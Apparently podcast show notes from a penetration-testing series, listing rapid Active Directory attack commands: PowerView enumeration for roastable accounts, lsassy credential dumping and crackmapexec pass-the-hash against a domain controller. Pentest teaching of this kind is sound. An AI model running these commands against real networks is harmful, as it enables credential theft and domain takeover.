|
Hi! This episode of pentest pwnage is a fun one because it was built for speeeeeeeeeeeeeeeed. Here's some of the things we're doing/running when time is of the essence: - Get a cmd.exe spun up in the context of your AD user account:
runas /netonly /user:samplecompany\billybob "C:\windows\system32\cmd.exe" Then get some important info in PowerView: -
Get-DomainUser -PreAuthNotRequired - find AD users with this flag set...then crack the hash for a (potentially) easy win! -
Get-NetUser -spn - find Kerberoastable accounts...then crack the hash for a (potentially) easy win! -
Find-LocalAdminAccess -Verbose helps you find where your general AD user has local admin access!
Once you know where you have local admin access, lsassy is your friend: - lsassy -d domain.com -u YOUR-USER -p YOUR-PASSWORD victim-server
Did you get an admin's NTLM hash from this dump? Then do this: - crackmapexec smb IP.OF.THE.DOMAINCONTROLLER -u ACCOUNT-YOU-DUMPED -H 'NTLM-HASH-OF-THAT-ACCOUNT-YOU-DUMPED
(Pwn3d!) FTW! |
.png)
More
Religion & Spirituality
Education
Arts and Design
Health
Fashion & Beauty
Government & Organizations
Kids & family
Music
News & Politics
Science & Medicine
Society & Culture
Sports & Recreation
TV & Film
Technology
Philosophy
Storytelling
Horror and Paranomal
True Crime
Leisure
Travel
Fiction
Crypto
Marketing
History
Comedy
Arts
Games & Hobbies
Business
Motivation